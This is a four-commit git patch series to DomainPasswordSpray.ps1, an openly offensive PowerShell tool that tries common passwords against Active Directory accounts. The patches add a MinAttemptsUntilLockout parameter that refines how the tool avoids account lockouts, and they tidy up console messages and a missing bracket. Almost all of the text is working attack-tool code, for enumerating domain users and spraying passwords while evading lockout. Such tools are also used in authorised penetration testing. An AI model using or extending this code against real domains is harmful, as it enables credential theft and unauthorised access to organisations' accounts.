From 22f345a5a52e50a6995687cd22f49ebb33347b97 Mon Sep 17 00:00:00 2001 From: Martin Date: Tue, 18 May 2021 15:57:26 +0100 Subject: [PATCH 1/4] Added 'MinAttemptsUntilLockout' parameter --- DomainPasswordSpray.ps1 | 26 ++++++++++++++++++++++---- 1 file changed, 22 insertions(+), 4 deletions(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index 3395c47..b3a412c 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -46,6 +46,10 @@ function Invoke-DomainPasswordSpray{ For each user, will try that user's name as their password + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE C:\PS> Invoke-DomainPasswordSpray -Password Winter2016 @@ -109,7 +113,10 @@ function Invoke-DomainPasswordSpray{ $Delay=0, [Parameter(Position = 9, Mandatory = $false)] - $Jitter=0 + $Jitter=0, + + [Parameter(Position = 10, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 ) @@ -155,7 +162,7 @@ function Invoke-DomainPasswordSpray{ if ($UserList -eq "") { - $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter + $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter -MinAttemptsUntilLockout $MinAttemptsUntilLockout } else { @@ -281,6 +288,10 @@ function Get-DomainUserList Custom LDAP filter for users, e.g. "(description=*admin*)" + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE PS C:\> Get-DomainUserList @@ -313,9 +324,16 @@ function Get-DomainUserList [Parameter(Position = 3, Mandatory = $false)] [string] - $Filter + $Filter, + + [Parameter(Position = 4, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 ) + if($MinAttemptsUntilLockout -eq 1) { + Write-Host -ForegroundColor Red "[*] Warning! 'MinAttemptsUntilLockout' set to 1. This means the attack could target accounts which will be locked upon 1 bad attempt (the attempt you are about to perform)!" + } + try { if ($Domain -ne "") @@ -455,7 +473,7 @@ function Get-DomainUserList # if there is more than 1 attempt left before a user locks out # or if the time since the last failed login is greater than the domain # observation window add user to spray list - if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -gt 1)) + if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout)) { $UserListArray += $samaccountname } From 2bfdb5df8848c5eb9a65ceda8ba2f2666ce1f1f7 Mon Sep 17 00:00:00 2001 From: Martin Date: Tue, 18 May 2021 16:01:42 +0100 Subject: [PATCH 2/4] Remove irrelevant console line if no output file is specified --- DomainPasswordSpray.ps1 | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index b3a412c..b8f03cc 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -521,7 +521,10 @@ function Invoke-SpraySinglePassword $count = $UserListArray.count Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())" $curr_user = 0 - Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + if ($OutFile -ne "") + { + Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + } $RandNo = New-Object System.Random foreach ($User in $UserListArray) From 5804a85166ffacd6ec7c27d75ea6f5cbb3b44722 Mon Sep 17 00:00:00 2001 From: Martin Date: Tue, 18 May 2021 16:15:48 +0100 Subject: [PATCH 3/4] Ignore console line if only testing one password --- DomainPasswordSpray.ps1 | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index b8f03cc..d0f9fb0 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -181,18 +181,16 @@ function Invoke-DomainPasswordSpray{ } } + + $observation_window = Get-ObservationWindow $CurrentDomain + Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." if ($Passwords.count -gt 1) - { Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!" + Write-Host "[*] Setting a $observation_window minute wait in between sprays." } - $observation_window = Get-ObservationWindow $CurrentDomain - - Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - Write-Host "[*] Setting a $observation_window minute wait in between sprays." - # if no force flag is set we will ask if the user is sure they want to spray if (!$Force) { From aa5d139f3dcac712b6d876e7208ba112f799335b Mon Sep 17 00:00:00 2001 From: Martin Date: Tue, 18 May 2021 16:19:55 +0100 Subject: [PATCH 4/4] Missing bracket --- DomainPasswordSpray.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index d0f9fb0..8840398 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -186,7 +186,7 @@ function Invoke-DomainPasswordSpray{ Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - if ($Passwords.count -gt 1) + if ($Passwords.count -gt 1) { Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!" Write-Host "[*] Setting a $observation_window minute wait in between sprays." }